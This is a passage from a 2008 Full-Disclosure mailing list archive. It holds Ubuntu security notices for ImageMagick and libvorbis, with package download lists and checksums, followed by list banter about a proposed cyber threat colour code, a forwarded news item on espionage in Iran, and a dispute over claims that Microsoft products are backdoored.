http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick9-dev_6.2.4.5-0.6ubuntu0.8_sparc.deb Size/MD5: 1810056 df876fb99e74ac4efce39d6292fc7ed1 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick9_6.2.4.5-0.6ubuntu0.8_sparc.deb Size/MD5: 1345938 6860ae7d2d44f88534954fa0bb13bf88 http://security.ubuntu.com/ubuntu/pool/universe/i/imagemagick/perlmagick_6.2.4.5-0.6ubuntu0.8_sparc.deb Size/MD5: 169680 b4484481d95850f256bdb2b74d7d55cb Updated packages for Ubuntu 7.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.2.4.5.dfsg1-2ubuntu1.1.diff.gz Size/MD5: 102763 811963207b510b778d0d7dfe587f51b5 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.2.4.5.dfsg1-2ubuntu1.1.dsc Size/MD5: 1161 cdd5a298b1e72c812040be67afcf3133 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.2.4.5.dfsg1.orig.tar.gz Size/MD5: 5203463 2c5d3723d25c4119cf003efce2161c56 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.2.4.5.dfsg1-2ubuntu1.1_amd64.deb Size/MD5: 741190 22a0f42c8fe6bf82b7e588a10960c7e6 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++9-dev_6.2.4.5.dfsg1-2ubuntu1.1_amd64.deb Size/MD5: 250830 d7fe4b4df55c1ac4f9b4628492e12f38 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++9c2a_6.2.4.5.dfsg1-2ubuntu1.1_amd64.deb Size/MD5: 190196 3c81b936c68598a798eeee0e64c11eee http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick9-dev_6.2.4.5.dfsg1-2ubuntu1.1_amd64.deb Size/MD5: 1690802 49383fd5daeff5e035e4b31e8d697209 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick9_6.2.4.5.dfsg1-2ubuntu1.1_amd64.deb Size/MD5: 1344812 1ff84f6ba161d153669c2078008c60c9 http://security.ubuntu.com/ubuntu/pool/universe/i/imagemagick/perlmagick_6.2.4.5.dfsg1-2ubuntu1.1_amd64.deb Size/MD5: 174500 c22f3e517108a16ee1cf2f6515cf6a59 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.2.4.5.dfsg1-2ubuntu1.1_i386.deb Size/MD5: 740024 1a3c4a2e1a4c08dc88c0021161b27aea http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++9-dev_6.2.4.5.dfsg1-2ubuntu1.1_i386.deb Size/MD5: 229606 30526dfa6efafe965c388b2f4bfa2a86 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++9c2a_6.2.4.5.dfsg1-2ubuntu1.1_i386.deb Size/MD5: 193348 606db68900dacebf677d179810e72400 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick9-dev_6.2.4.5.dfsg1-2ubuntu1.1_i386.deb Size/MD5: 1595204 4e55cb3cd9cf80b3ca1c208e4483baeb http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick9_6.2.4.5.dfsg1-2ubuntu1.1_i386.deb Size/MD5: 1299758 a5f58f9b23fc018b3f16d5ef6022d7e9 http://security.ubuntu.com/ubuntu/pool/universe/i/imagemagick/perlmagick_6.2.4.5.dfsg1-2ubuntu1.1_i386.deb Size/MD5: 170004 33cc347f9ae218ee1cff56038037572b lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/i/imagemagick/imagemagick_6.2.4.5.dfsg1-2ubuntu1.1_lpia.deb Size/MD5: 740068 b0b07bb6f6cd0013c6cc77d1ddb3c1b9 http://ports.ubuntu.com/pool/main/i/imagemagick/libmagick++9-dev_6.2.4.5.dfsg1-2ubuntu1.1_lpia.deb Size/MD5: 231664 05864c90d9a8eef57b1601ce729e2a9f http://ports.ubuntu.com/pool/main/i/imagemagick/libmagick++9c2a_6.2.4.5.dfsg1-2ubuntu1.1_lpia.deb Size/MD5: 189572 dffbb7faddc85df1c040d770daa4bbf3 http://ports.ubuntu.com/pool/main/i/imagemagick/libmagick9-dev_6.2.4.5.dfsg1-2ubuntu1.1_lpia.deb Size/MD5: 1612224 a9ef6f4e75bdba532245861cf885ea44 http://ports.ubuntu.com/pool/main/i/imagemagick/libmagick9_6.2.4.5.dfsg1-2ubuntu1.1_lpia.deb Size/MD5: 1303844 e1d3379589cdce724db0ea694e6ced24 http://ports.ubuntu.com/pool/universe/i/imagemagick/perlmagick_6.2.4.5.dfsg1-2ubuntu1.1_lpia.deb Size/MD5: 174134 983b86da5547223294ba688951168c5b powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.2.4.5.dfsg1-2ubuntu1.1_powerpc.deb Size/MD5: 748896 1f782e8b18ef490a011058c1b2856503 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++9-dev_6.2.4.5.dfsg1-2ubuntu1.1_powerpc.deb Size/MD5: 253594 c76d8b774405138a6d13f1cf38779a51 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++9c2a_6.2.4.5.dfsg1-2ubuntu1.1_powerpc.deb Size/MD5: 202724 c0524feeace6bc5596ddc470cfdebeac http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick9-dev_6.2.4.5.dfsg1-2ubuntu1.1_powerpc.deb Size/MD5: 1923526 63ee716b9cd22f6ee313d2e64989d4c8 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick9_6.2.4.5.dfsg1-2ubuntu1.1_powerpc.deb Size/MD5: 1358750 5818d6912d7d440f5ffaf80c6dd7dfd3 http://security.ubuntu.com/ubuntu/pool/universe/i/imagemagick/perlmagick_6.2.4.5.dfsg1-2ubuntu1.1_powerpc.deb Size/MD5: 173422 9a8dda1198866d8f2f9c3a78522e8af2 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.2.4.5.dfsg1-2ubuntu1.1_sparc.deb Size/MD5: 741060 b7a79b518707f40a45cb8962406cecab http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++9-dev_6.2.4.5.dfsg1-2ubuntu1.1_sparc.deb Size/MD5: 230760 af528afb7d77f825fea574a66e528a04 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++9c2a_6.2.4.5.dfsg1-2ubuntu1.1_sparc.deb Size/MD5: 193168 ce61ffd320fd022743da316b2a889dd3 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick9-dev_6.2.4.5.dfsg1-2ubuntu1.1_sparc.deb Size/MD5: 1858960 98309e6cca4b1c979a84c022988d271c http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick9_6.2.4.5.dfsg1-2ubuntu1.1_sparc.deb Size/MD5: 1399932 fb4cde1381eacc9357f52ddd607aef4f http://security.ubuntu.com/ubuntu/pool/universe/i/imagemagick/perlmagick_6.2.4.5.dfsg1-2ubuntu1.1_sparc.deb Size/MD5: 175946 65ea96b9ebfc22fd9eea8daee44f38d4 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 197 bytes Desc: This is a digitally signed message part Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081201/3213e802/attachment.bin From marc.deslauriers at canonical.com Mon Dec 1 17:11:59 2008 From: marc.deslauriers at canonical.com (Marc Deslauriers) Date: Mon, 01 Dec 2008 12:11:59 -0500 Subject: [Full-disclosure] [USN-682-1] libvorbis vulnerabilities Message-ID: <1228151519.9860.4.camel@mdlinux.technorage.com> =========================================================== Ubuntu Security Notice USN-682-1 December 01, 2008 libvorbis vulnerabilities CVE-2008-1419, CVE-2008-1420, CVE-2008-1423 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 7.10 Ubuntu 8.04 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: libvorbis0a 1.1.2-0ubuntu2.3 Ubuntu 7.10: libvorbis0a 1.2.0.dfsg-1ubuntu0.1 Ubuntu 8.04 LTS: libvorbis0a 1.2.0.dfsg-2ubuntu0.1 After a standard system upgrade you need to restart any applications that use libvorbis, such as Totem and gtkpod, to effect the necessary changes. Details follow: It was discovered that libvorbis did not correctly handle certain malformed sound files. If a user were tricked into opening a specially crafted sound file with an application that uses libvorbis, an attacker could execute arbitrary code with the user's privileges. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis_1.1.2-0ubuntu2.3.diff.gz Size/MD5: 11735 23f3260732f1b61563011034bf9aff5a http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis_1.1.2-0ubuntu2.3.dsc Size/MD5: 706 0758a89dc0616697d3cb128b0f42e475 http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis_1.1.2.orig.tar.gz Size/MD5: 1316434 37847626b8e1b53ae79a34714c7b3211 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis-dev_1.1.2-0ubuntu2.3_amd64.deb Size/MD5: 487988 6ac00dab1115b85c27189621c06c008f http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis0a_1.1.2-0ubuntu2.3_amd64.deb Size/MD5: 101856 0c92f61c2c777cce1d5277ed840fffcc http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbisenc2_1.1.2-0ubuntu2.3_amd64.deb Size/MD5: 100908 78d05f9a2670e1a87740c9cc629782fd http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbisfile3_1.1.2-0ubuntu2.3_amd64.deb Size/MD5: 18646 4df2145dff94106c81ee2fcac873a75b i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis-dev_1.1.2-0ubuntu2.3_i386.deb Size/MD5: 469316 1f9bdb104c24279d1c92c363640afce1 http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis0a_1.1.2-0ubuntu2.3_i386.deb Size/MD5: 96240 844260578e93b48388975720d845c033 http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbisenc2_1.1.2-0ubuntu2.3_i386.deb Size/MD5: 82932 6c614ab9888672510e947f1d246db071 http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbisfile3_1.1.2-0ubuntu2.3_i386.deb Size/MD5: 19584 a206c9c5fb541f709fd4a4dce8c606ca powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis-dev_1.1.2-0ubuntu2.3_powerpc.deb Size/MD5: 503692 f929a9177343adbf367e74c0ea5cbee7 http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis0a_1.1.2-0ubuntu2.3_powerpc.deb Size/MD5: 106230 f01391134bebdff866c694f14b8be256 http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbisenc2_1.1.2-0ubuntu2.3_powerpc.deb Size/MD5: 86804 5d328592302bc7d23742c0d32d3322f4 http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbisfile3_1.1.2-0ubuntu2.3_powerpc.deb Size/MD5: 22616 921a35c6e272fd4c00a8ed82d2855aca sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis-dev_1.1.2-0ubuntu2.3_sparc.deb Size/MD5: 478580 e7b9e3d3444aa9b2516e2de383ad0212 http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis0a_1.1.2-0ubuntu2.3_sparc.deb Size/MD5: 99560 c7a45c44998fff502735a1a555c533ef http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbisenc2_1.1.2-0ubuntu2.3_sparc.deb Size/MD5: 84760 b12349cd58f4c20dd510f7bc4018ceba http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbisfile3_1.1.2-0ubuntu2.3_sparc.deb Size/MD5: 19434 2865e544cff32fffeb9e5b91d2d9f5b9 Updated packages for Ubuntu 7.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis_1.2.0.dfsg-1ubuntu0.1.diff.gz Size/MD5: 6803 eba88f0d5ed7e99f23c390ac5b061aa6 http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis_1.2.0.dfsg-1ubuntu0.1.dsc Size/MD5: 936 0afaeb24889965a41966dbce3d9bd8e6 http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis_1.2.0.dfsg.orig.tar.gz Size/MD5: 1477935 3c7fff70c0989ab3c1c85366bf670818 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis-dev_1.2.0.dfsg-1ubuntu0.1_amd64.deb Size/MD5: 475590 7a6503ea10ce1550dfa80f4d3cce5fb3 http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis0a_1.2.0.dfsg-1ubuntu0.1_amd64.deb Size/MD5: 104288 0c60601a0a2b44caf7789c6d4a20965e http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbisenc2_1.2.0.dfsg-1ubuntu0.1_amd64.deb Size/MD5: 94172 f617ece4bdf424c66614e1ed29e1e3b0 http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbisfile3_1.2.0.dfsg-1ubuntu0.1_amd64.deb Size/MD5: 19202 a1831a3dd4389bff251d4aa9a127a80e i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis-dev_1.2.0.dfsg-1ubuntu0.1_i386.deb Size/MD5: 455008 d98ab2c958d7ab2afaefed5084cf7d57 http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis0a_1.2.0.dfsg-1ubuntu0.1_i386.deb Size/MD5: 99594 0fd621c1950703339239f5aed7f4c805 http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbisenc2_1.2.0.dfsg-1ubuntu0.1_i386.deb Size/MD5: 75998 3843a868a9bfc8f330270e5ea966b753 http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbisfile3_1.2.0.dfsg-1ubuntu0.1_i386.deb Size/MD5: 20064 a69d1699effba03d8de9b98ddbcb9748 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/libv/libvorbis/libvorbis-dev_1.2.0.dfsg-1ubuntu0.1_lpia.deb Size/MD5: 457286 030878c8e2394ce9ecd92c03de803098 http://ports.ubuntu.com/pool/main/libv/libvorbis/libvorbis0a_1.2.0.dfsg-1ubuntu0.1_lpia.deb Size/MD5: 100054 68f25494c3ec5217af8263d60b67915b http://ports.ubuntu.com/pool/main/libv/libvorbis/libvorbisenc2_1.2.0.dfsg-1ubuntu0.1_lpia.deb Size/MD5: 76134 68219cdf66ec0aa276c695fface59427 http://ports.ubuntu.com/pool/main/libv/libvorbis/libvorbisfile3_1.2.0.dfsg-1ubuntu0.1_lpia.deb Size/MD5: 19900 8e45f8dc189f83d860066975e178712e powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis-dev_1.2.0.dfsg-1ubuntu0.1_powerpc.deb Size/MD5: 484714 a6c8845587f6a2b27e054dac925340b3 http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis0a_1.2.0.dfsg-1ubuntu0.1_powerpc.deb Size/MD5: 109326 dced4c6926117ed364d36b83ebc5722a http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbisenc2_1.2.0.dfsg-1ubuntu0.1_powerpc.deb Size/MD5: 83698 6f2af6040278913dae5e595fbe2de6c1 http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbisfile3_1.2.0.dfsg-1ubuntu0.1_powerpc.deb Size/MD5: 23756 4f74ee6f4f17466807770592e4cc1262 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis-dev_1.2.0.dfsg-1ubuntu0.1_sparc.deb Size/MD5: 462312 f378e16a892a6613391579ebd78a1cb8 http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis0a_1.2.0.dfsg-1ubuntu0.1_sparc.deb Size/MD5: 100548 fa60ade69e538ab433a4f29c39d47626 http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbisenc2_1.2.0.dfsg-1ubuntu0.1_sparc.deb Size/MD5: 80566 992176befcc1e4b0f5c9e8623446d388 http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbisfile3_1.2.0.dfsg-1ubuntu0.1_sparc.deb Size/MD5: 19260 42b606b63d8d534776b805cd089e7208 Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis_1.2.0.dfsg-2ubuntu0.1.diff.gz Size/MD5: 6859 229d235964b97a77019007f465e6be12 http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis_1.2.0.dfsg-2ubuntu0.1.dsc Size/MD5: 936 cb80528452572db8df019ee48022bfec http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis_1.2.0.dfsg.orig.tar.gz Size/MD5: 1477935 3c7fff70c0989ab3c1c85366bf670818 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis-dev_1.2.0.dfsg-2ubuntu0.1_amd64.deb Size/MD5: 474602 019214230eddd04a756dcd6eb206f4d5 http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis0a_1.2.0.dfsg-2ubuntu0.1_amd64.deb Size/MD5: 103554 105de05b983d65a404f60af6eea67e68 http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbisenc2_1.2.0.dfsg-2ubuntu0.1_amd64.deb Size/MD5: 94216 c6c2e356c2dc96d4af547fb2a1dd5b34 http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbisfile3_1.2.0.dfsg-2ubuntu0.1_amd64.deb Size/MD5: 18928 82c4d54a4f30c7e41da333543e2d1370 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis-dev_1.2.0.dfsg-2ubuntu0.1_i386.deb Size/MD5: 455286 75d65fe98e008eb426c47822221b8903 http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis0a_1.2.0.dfsg-2ubuntu0.1_i386.deb Size/MD5: 98426 3d03860f8b0271c7f04e5eb5681800b9 http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbisenc2_1.2.0.dfsg-2ubuntu0.1_i386.deb Size/MD5: 76012 2190470c51c85850e153416e10cb9583 http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbisfile3_1.2.0.dfsg-2ubuntu0.1_i386.deb Size/MD5: 19782 943c8d8a7b3cbface595f47b87d4129e lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/libv/libvorbis/libvorbis-dev_1.2.0.dfsg-2ubuntu0.1_lpia.deb Size/MD5: 457272 6b6c65e2e8a4883c567723a31c970909 http://ports.ubuntu.com/pool/main/libv/libvorbis/libvorbis0a_1.2.0.dfsg-2ubuntu0.1_lpia.deb Size/MD5: 99072 af5d515bb4159f811df31789606cf6fa http://ports.ubuntu.com/pool/main/libv/libvorbis/libvorbisenc2_1.2.0.dfsg-2ubuntu0.1_lpia.deb Size/MD5: 76154 39f582ff09a3e43c6690ece11c1272de http://ports.ubuntu.com/pool/main/libv/libvorbis/libvorbisfile3_1.2.0.dfsg-2ubuntu0.1_lpia.deb Size/MD5: 19778 2482fd35cdcfaf93af997a11f2277859 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/libv/libvorbis/libvorbis-dev_1.2.0.dfsg-2ubuntu0.1_powerpc.deb Size/MD5: 484204 128ddaebf7ab8c95288de20b309b7b39 http://ports.ubuntu.com/pool/main/libv/libvorbis/libvorbis0a_1.2.0.dfsg-2ubuntu0.1_powerpc.deb Size/MD5: 108516 a15c110e58da00ce9e851f8f04909673 http://ports.ubuntu.com/pool/main/libv/libvorbis/libvorbisenc2_1.2.0.dfsg-2ubuntu0.1_powerpc.deb Size/MD5: 83532 be00dcbd1f6a209ff7e59669ea3bcf33 http://ports.ubuntu.com/pool/main/libv/libvorbis/libvorbisfile3_1.2.0.dfsg-2ubuntu0.1_powerpc.deb Size/MD5: 23644 d07be5c602f3714cf0701226fef5bfa4 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/libv/libvorbis/libvorbis-dev_1.2.0.dfsg-2ubuntu0.1_sparc.deb Size/MD5: 461822 9396b9f159e3e96ce44c140f02dcf3cb http://ports.ubuntu.com/pool/main/libv/libvorbis/libvorbis0a_1.2.0.dfsg-2ubuntu0.1_sparc.deb Size/MD5: 99428 8dbbaf70afa928a5d2407d1eef3b1922 http://ports.ubuntu.com/pool/main/libv/libvorbis/libvorbisenc2_1.2.0.dfsg-2ubuntu0.1_sparc.deb Size/MD5: 80484 e5592f1cd6297a630fd7358d6c88c82e http://ports.ubuntu.com/pool/main/libv/libvorbis/libvorbisfile3_1.2.0.dfsg-2ubuntu0.1_sparc.deb Size/MD5: 19054 66c63c0e4024661e9d905b22862450c5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 197 bytes Desc: This is a digitally signed message part Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081201/a9ce3ca0/attachment.bin From xploitable at gmail.com Mon Dec 1 20:52:11 2008 From: xploitable at gmail.com (n3td3v) Date: Mon, 1 Dec 2008 20:52:11 +0000 Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security In-Reply-To: <49341071.4050608@gmail.com> References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org> <49341071.4050608@gmail.com> Message-ID: <4b6ee9310812011252k548e4824va31a2fdede3701eb@mail.gmail.com> Maybe he thinks the same as you and is making fun of the Department of Homeland Security, SANS Internet Storm Center etc. On Mon, Dec 1, 2008 at 4:27 PM, rholgstad wrote: > and how does making a color based on these inputs protect people? > > Mike C wrote: >> On Mon, Dec 1, 2008 at 4:21 AM, vulcanius wrote: >> >>> By the way, I also noticed that the new site for your project has the >>> current threat level as yellow. Is it safe to assume that you've already got >>> your metric systems in place and running? >>> >>> >> >> Yes, >> >> We do have a working framework for color code generation. The inputs >> to this function include >> >> *exploits released in the past week >> - The severity of the exploit >> - The application it was in >> - The language >> - estimated users of the software >> >> *The previous week's color >> >> *Localized nature of exploits. >> >> We cannot comment more on this until it is refined and standardized. >> If you are (or know) an antivirus vendor, please contact me offline to >> move ahead. >> >> > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From nytrokiss at gmail.com Mon Dec 1 21:30:23 2008 From: nytrokiss at gmail.com (James Matthews) Date: Mon, 1 Dec 2008 23:30:23 +0200 Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security In-Reply-To: <4b6ee9310812011252k548e4824va31a2fdede3701eb@mail.gmail.com> References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org> <49341071.4050608@gmail.com> <4b6ee9310812011252k548e4824va31a2fdede3701eb@mail.gmail.com> Message-ID: <8a6b8e350812011330m445ce661s419de49f1a47fc5b@mail.gmail.com> The color system was made in order to give people a quick look at the terror scale. So to this can be something for us to have a quick look at the exploit scale. Remember these colors are for people in the IT industry and not for the average person. James On Mon, Dec 1, 2008 at 10:52 PM, n3td3v wrote: > Maybe he thinks the same as you and is making fun of the Department of > Homeland Security, SANS Internet Storm Center etc. > > On Mon, Dec 1, 2008 at 4:27 PM, rholgstad wrote: > > and how does making a color based on these inputs protect people? > > > > Mike C wrote: > >> On Mon, Dec 1, 2008 at 4:21 AM, vulcanius wrote: > >> > >>> By the way, I also noticed that the new site for your project has the > >>> current threat level as yellow. Is it safe to assume that you've > already got > >>> your metric systems in place and running? > >>> > >>> > >> > >> Yes, > >> > >> We do have a working framework for color code generation. The inputs > >> to this function include > >> > >> *exploits released in the past week > >> - The severity of the exploit > >> - The application it was in > >> - The language > >> - estimated users of the software > >> > >> *The previous week's color > >> > >> *Localized nature of exploits. > >> > >> We cannot comment more on this until it is refined and standardized. > >> If you are (or know) an antivirus vendor, please contact me offline to > >> move ahead. > >> > >> > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- http://www.astorandblack.com/ http://www.jewelerslounge.com/movado-watches-on-sale -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081201/393e179a/attachment.html From xploitable at gmail.com Mon Dec 1 22:06:10 2008 From: xploitable at gmail.com (n3td3v) Date: Mon, 1 Dec 2008 22:06:10 +0000 Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security In-Reply-To: <8a6b8e350812011330m445ce661s419de49f1a47fc5b@mail.gmail.com> References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org> <49341071.4050608@gmail.com> <4b6ee9310812011252k548e4824va31a2fdede3701eb@mail.gmail.com> <8a6b8e350812011330m445ce661s419de49f1a47fc5b@mail.gmail.com> Message-ID: <4b6ee9310812011406k2f447c58x81fe2ba0a44cd7dd@mail.gmail.com> On Mon, Dec 1, 2008 at 9:30 PM, James Matthews wrote: > The color system was made in order to give people a quick look at the terror > scale. What does the terror scale do to help the population who are sitting in their living rooms? It makes for good television on 24-hour news channels while poking my bum, but it does little in the way of doing anything past entertainment & drama. > Remember these colors are for people in the IT industry and > not for the average person. I lol'd From xploitable at gmail.com Mon Dec 1 22:25:34 2008 From: xploitable at gmail.com (n3td3v) Date: Mon, 1 Dec 2008 22:25:34 +0000 Subject: [Full-disclosure] Fwd: Iran executes IT expert who spied for Israel In-Reply-To: <4b6ee9310812011423k6a8f45d7mf6bcb863b0f9dea6@mail.gmail.com> References: <4b6ee9310812011423k6a8f45d7mf6bcb863b0f9dea6@mail.gmail.com> Message-ID: <4b6ee9310812011425v210b0069ofc3260599ec5dd76@mail.gmail.com> ---------- Forwarded message ---------- From: n3td3v Date: Mon, Dec 1, 2008 at 10:23 PM Subject: Iran executes IT expert who spied for Israel To: n3td3v "A COMPUTER expert has been executed in Iran after he confessed to working for Mossad, the Israeli intelligence service. This provides a rare insight into the intense espionage activity inside the Islamic republic." http://www.timesonline.co.uk/tol/news/world/middle_east/article5258057.ece From xploitable at gmail.com Mon Dec 1 22:51:34 2008 From: xploitable at gmail.com (n3td3v) Date: Mon, 1 Dec 2008 22:51:34 +0000 Subject: [Full-disclosure] More proof that Microsoft products are probably backdoored In-Reply-To: References: <4b6ee9310812011313t1c99e858p3da9f8a278c97512@mail.gmail.com> Message-ID: <4b6ee9310812011451j5a04367ewc7752363e8f12ac@mail.gmail.com> If they use zero-day exploits then thats illegal. Secondly, are they using zero-day exploits post on public mailing lists or using their own home grown exploits that the bad guys and potentially the vendor doesn't know about? On Mon, Dec 1, 2008 at 10:44 PM, Aaron Gray wrote: > "proof", did you read the article ? > They are after your bad guys and probably using zero day exploits !? > On Mon, Dec 1, 2008 at 9:13 PM, n3td3v wrote: >> >> http://news.bbc.co.uk/1/hi/technology/7758127.stm > From xploitable at gmail.com Mon Dec 1 23:32:59 2008 From: xploitable at gmail.com (n3td3v) Date: Mon, 1 Dec 2008 23:32:59 +0000 Subject: [Full-disclosure] More proof that Microsoft products are probably backdoored In-Reply-To: References: <4b6ee9310812011313t1c99e858p3da9f8a278c97512@mail.gmail.com> <4b6ee9310812011451j5a04367ewc7752363e8f12ac@mail.gmail.com> Message-ID: <4b6ee9310812011532g7821896bgdf6f149502c9e152@mail.gmail.com> Which court order? Post a link. On Mon, Dec 1, 2008 at 11:27 PM, Aaron Gray wrote: > Probably not with a court order. > > On Mon, Dec 1, 2008 at 10:51 PM, n3td3v wrote: >> >> If they use zero-day exploits then thats illegal. >> >> Secondly, are they using zero-day exploits post on public mailing >> lists or using their own home grown exploits that the bad guys and >> potentially the vendor doesn't know about? >> >> On Mon, Dec 1, 2008 at 10:44 PM, Aaron Gray wrote: >> > "proof", did you read the article ? >> > They are after your bad guys and probably using zero day exploits !? >> > On Mon, Dec 1, 2008 at 9:13 PM, n3td3v wrote: >> >> >> >> http://news.bbc.co.uk/1/hi/technology/7758127.stm >> > > > From joel at helgeson.com Mon Dec 1 18:50:56 2008 From: joel at helgeson.com (Joel Helgeson) Date: Mon, 1 Dec 2008 12:50:56 -0600 Subject: [Full-disclosure] Security industry software license In-Reply-To: <197321660811291707w3178891di1432bf54d4d68f3d@mail.gmail.com> 